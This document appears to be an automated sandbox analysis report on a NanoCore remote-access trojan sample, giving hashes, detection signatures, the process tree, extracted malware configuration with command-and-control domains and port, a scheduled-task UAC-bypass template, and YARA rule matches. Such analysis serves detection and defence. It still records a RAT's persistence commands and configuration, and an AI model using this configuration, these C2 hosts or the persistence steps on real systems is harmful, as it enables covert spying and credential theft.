Edit tour

Windows Analysis Report
P05jmXYKpr.exe

Overview

General Information

Sample Name:	P05jmXYKpr.exe
Original Sample Name:	db555a9de355c70681e2e5f9ed38a335.exe
Analysis ID:	877862
MD5:	db555a9de355c70681e2e5f9ed38a335
SHA1:	07534d5012526f6bdec5314a4d140de5d94672ea
SHA256:	fb25c8a64c09f9c4e8c586b94d5cda1dc69be203b786ea297f9293d7bd7b8b30
Tags:	exeNanoCoreRAT
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected AntiVM autoit script

Antivirus detection for URL or domain

Yara detected Nanocore RAT

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Starts an encoded Visual Basic Script (VBE)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Uses ipconfig to lookup or modify the Windows network settings

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Writes to foreign memory regions

Protects its processes via BreakOnTermination flag

Contains functionality to modify clipboard data

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

OS version to string mapping found (often used in BOTs)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to execute programs as a different user

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Contains functionality to simulate mouse events

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

System is w10x64

P05jmXYKpr.exe (PID: 7296 cmdline: C:\Users\user\Desktop\P05jmXYKpr.exe MD5: DB555A9DE355C70681E2E5F9ED38A335)

wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\wscript.exe" Update-ta.l.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 7412 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ipconfig.exe (PID: 7480 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 7432 cmdline: "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

boaliim.dat (PID: 7512 cmdline: boaliim.dat ikvvfncnn.bmp MD5: D70543055E19B63641C7D5CB908EAEC7)

RegSvcs.exe (PID: 7772 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

schtasks.exe (PID: 7796 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 7852 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7620 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ipconfig.exe (PID: 7660 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)

RegSvcs.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 7940 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nanocore RAT, NanoCore	Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.	APT33 The Gorgon Group	https://assets.virustotal.com/reports/2021trends.pdf https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.morphisec.com/syk-crypter-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "72ec1ea3-16bf-4e76-a7cf-15ed5e2a", "Group": "Marcello", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 61715, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x227f:$x2: NanoCore.ClientPlugin 0x2205:$x3: NanoCore.ClientPluginHost 0x2295:$i3: IClientNetwork 0x221f:$i6: IClientLoggingHost 0x223e:$i7: IClientNetworkHost 0x1f9f:$s1: ClientPlugin 0x2288:$s1: ClientPlugin
0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2205:$a1: NanoCore.ClientPluginHost 0x227f:$a2: NanoCore.ClientPlugin 0x29a0:$b7: LogClientException 0x221f:$b9: IClientLoggingHost
0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b70:$x2: NanoCore.ClientPlugin 0x5b99:$x3: NanoCore.ClientPluginHost 0x5b61:$i3: IClientNetwork 0x5b86:$i6: IClientLoggingHost 0x5bb3:$i7: IClientNetworkHost 0x59d4:$s1: ClientPlugin 0x5b79:$s1: ClientPlugin 0x5e84:$s2: EndPoint 0x5e8d:$s3: IPAddress 0x5e97:$s4: IPEndPoint
0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b99:$a1: NanoCore.ClientPluginHost 0x5b70:$a2: NanoCore.ClientPlugin 0x5b86:$b9: IClientLoggingHost
00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x10dd5:$x1: NanoCore.ClientPluginHost 0x10e12:$x2: IClientNetworkHost 0x14945:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10b3d:$a: NanoCore 0x10b4d:$a: NanoCore 0x10d81:$a: NanoCore 0x10d95:$a: NanoCore 0x10dd5:$a: NanoCore 0x10b9c:$b: ClientPlugin 0x10d9e:$b: ClientPlugin 0x10dde:$b: ClientPlugin 0x10cc3:$c: ProjectData 0x116ca:$d: DESCrypto 0x19096:$e: KeepAlive 0x17084:$g: LogClientMessage 0x1327f:$i: get_Connected 0x11a00:$j: #=q 0x11a30:$j: #=q 0x11a4c:$j: #=q 0x11a7c:$j: #=q 0x11a98:$j: #=q 0x11ab4:$j: #=q 0x11ae4:$j: #=q 0x11b00:$j: #=q
00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10dd5:$a1: NanoCore.ClientPluginHost 0x10d95:$a2: NanoCore.ClientPlugin 0x12cee:$b1: get_BuilderSettings 0x10bf1:$b2: ClientLoaderForm.resources 0x1240e:$b3: PluginCommand 0x10dc6:$b4: IClientAppHost 0x1b246:$b5: GetBlockHash 0x13346:$b6: AddHostEntry 0x17039:$b7: LogClientException 0x132b3:$b8: PipeExists 0x10dff:$b9: IClientLoggingHost
0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1f1b2:$x2: NanoCore.ClientPlugin 0x1f1db:$x3: NanoCore.ClientPluginHost 0x1f1a3:$i3: IClientNetwork 0x1f1c8:$i6: IClientLoggingHost 0x1f1f5:$i7: IClientNetworkHost 0x1f208:$i8: IClientUIHost 0x1ef12:$s1: ClientPlugin 0x1f1bb:$s1: ClientPlugin
0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f1db:$a1: NanoCore.ClientPluginHost 0x1f1b2:$a2: NanoCore.ClientPlugin 0x24206:$b7: LogClientException 0x1f1c8:$b9: IClientLoggingHost
0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0x16fd:$i6: IClientLoggingHost 0x171c:$i7: IClientNetworkHost 0x1491:$s1: ClientPlugin 0x1768:$s1: ClientPlugin
0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0x16fd:$b9: IClientLoggingHost
00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf5cd:$x1: NanoCore.ClientPluginHost 0x43dd5:$x1: NanoCore.ClientPluginHost 0xf60a:$x2: IClientNetworkHost 0x43e12:$x2: IClientNetworkHost 0x1313d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47945:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf335:$a: NanoCore 0xf345:$a: NanoCore 0xf579:$a: NanoCore 0xf58d:$a: NanoCore 0xf5cd:$a: NanoCore 0x43b3d:$a: NanoCore 0x43b4d:$a: NanoCore 0x43d81:$a: NanoCore 0x43d95:$a: NanoCore 0x43dd5:$a: NanoCore 0xf394:$b: ClientPlugin 0xf596:$b: ClientPlugin 0xf5d6:$b: ClientPlugin 0x43b9c:$b: ClientPlugin 0x43d9e:$b: ClientPlugin 0x43dde:$b: ClientPlugin 0xf4bb:$c: ProjectData 0x43cc3:$c: ProjectData 0xfec2:$d: DESCrypto 0x446ca:$d: DESCrypto 0x1788e:$e: KeepAlive
00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf5cd:$a1: NanoCore.ClientPluginHost 0x43dd5:$a1: NanoCore.ClientPluginHost 0xf58d:$a2: NanoCore.ClientPlugin 0x43d95:$a2: NanoCore.ClientPlugin 0x114e6:$b1: get_BuilderSettings 0x45cee:$b1: get_BuilderSettings 0xf3e9:$b2: ClientLoaderForm.resources 0x43bf1:$b2: ClientLoaderForm.resources 0x10c06:$b3: PluginCommand 0x4540e:$b3: PluginCommand 0xf5be:$b4: IClientAppHost 0x43dc6:$b4: IClientAppHost 0x19a3e:$b5: GetBlockHash 0x4e246:$b5: GetBlockHash 0x11b3e:$b6: AddHostEntry 0x46346:$b6: AddHostEntry 0x15831:$b7: LogClientException 0x4a039:$b7: LogClientException 0x11aab:$b8: PipeExists 0x462b3:$b8: PipeExists 0xf5f7:$b9: IClientLoggingHost
00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf5dd:$x1: NanoCore.ClientPluginHost 0x43de5:$x1: NanoCore.ClientPluginHost 0xf61a:$x2: IClientNetworkHost 0x43e22:$x2: IClientNetworkHost 0x1314d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47955:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf345:$a: NanoCore 0xf355:$a: NanoCore 0xf589:$a: NanoCore 0xf59d:$a: NanoCore 0xf5dd:$a: NanoCore 0x43b4d:$a: NanoCore 0x43b5d:$a: NanoCore 0x43d91:$a: NanoCore 0x43da5:$a: NanoCore 0x43de5:$a: NanoCore 0xf3a4:$b: ClientPlugin 0xf5a6:$b: ClientPlugin 0xf5e6:$b: ClientPlugin 0x43bac:$b: ClientPlugin 0x43dae:$b: ClientPlugin 0x43dee:$b: ClientPlugin 0xf4cb:$c: ProjectData 0x43cd3:$c: ProjectData 0xfed2:$d: DESCrypto 0x446da:$d: DESCrypto 0x1789e:$e: KeepAlive
00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf5dd:$a1: NanoCore.ClientPluginHost 0x43de5:$a1: NanoCore.ClientPluginHost 0xf59d:$a2: NanoCore.ClientPlugin 0x43da5:$a2: NanoCore.ClientPlugin 0x114f6:$b1: get_BuilderSettings 0x45cfe:$b1: get_BuilderSettings 0xf3f9:$b2: ClientLoaderForm.resources 0x43c01:$b2: ClientLoaderForm.resources 0x10c16:$b3: PluginCommand 0x4541e:$b3: PluginCommand 0xf5ce:$b4: IClientAppHost 0x43dd6:$b4: IClientAppHost 0x19a4e:$b5: GetBlockHash 0x4e256:$b5: GetBlockHash 0x11b4e:$b6: AddHostEntry 0x46356:$b6: AddHostEntry 0x15841:$b7: LogClientException 0x4a049:$b7: LogClientException 0x11abb:$b8: PipeExists 0x462c3:$b8: PipeExists 0xf607:$b9: IClientLoggingHost
0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xff8d:$a1: NanoCore.ClientPluginHost 0xff4d:$a2: NanoCore.ClientPlugin 0x11ea6:$b1: get_BuilderSettings 0xfda9:$b2: ClientLoaderForm.resources 0x115c6:$b3: PluginCommand 0xff7e:$b4: IClientAppHost 0x1a3fe:$b5: GetBlockHash 0x124fe:$b6: AddHostEntry 0x161f1:$b7: LogClientException 0x1246b:$b8: PipeExists 0xffb7:$b9: IClientLoggingHost
0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x4b87:$i3: IClientNetwork 0x4bac:$i4: IClientAppHost 0x4bd5:$i5: IClientDataHost 0x4be5:$i7: IClientNetworkHost 0x4bf8:$i9: IClientNameObjectCollection 0x4c1d:$i10: IClientReadOnlyNameObjectCollection 0x49ce:$s1: ClientPlugin 0x4b9f:$s1: ClientPlugin
0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x8558:$b1: get_BuilderSettings 0x4bac:$b4: IClientAppHost
0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork 0x8b95:$i5: IClientDataHost 0x8bbf:$i6: IClientLoggingHost 0x8bd2:$i7: IClientNetworkHost 0x8be5:$i9: IClientNameObjectCollection 0x8902:$s1: ClientPlugin 0x8b88:$s1: ClientPlugin
0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x8bbf:$b9: IClientLoggingHost
0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3a8b:$x2: NanoCore.ClientPlugin 0x39eb:$x3: NanoCore.ClientPluginHost 0x3aa1:$i3: IClientNetwork 0x3a43:$i5: IClientDataHost 0x3a05:$i6: IClientLoggingHost 0x3a24:$i7: IClientNetworkHost 0x426c:$i9: IClientNameObjectCollection 0x3741:$s1: ClientPlugin 0x3a94:$s1: ClientPlugin 0x4680:$s2: EndPoint 0x4371:$s3: IPAddress 0x3c83:$s4: IPEndPoint 0x43a3:$s7: get_Connected
0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x39eb:$a1: NanoCore.ClientPluginHost 0x3a8b:$a2: NanoCore.ClientPlugin 0x47e1:$b7: LogClientException 0x3a05:$b9: IClientLoggingHost
0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1af0e:$a: NanoCore 0x1af33:$a: NanoCore 0x1af8c:$a: NanoCore 0x2b13f:$a: NanoCore 0x2b165:$a: NanoCore 0x2b1c1:$a: NanoCore 0x38027:$a: NanoCore 0x38080:$a: NanoCore 0x380b3:$a: NanoCore 0x382df:$a: NanoCore 0x3835b:$a: NanoCore 0x38974:$a: NanoCore 0x38abd:$a: NanoCore 0x38f91:$a: NanoCore 0x39278:$a: NanoCore 0x3928f:$a: NanoCore 0x4213f:$a: NanoCore 0x421bb:$a: NanoCore 0x44a9e:$a: NanoCore 0x4a075:$a: NanoCore 0x4a0ef:$a: NanoCore
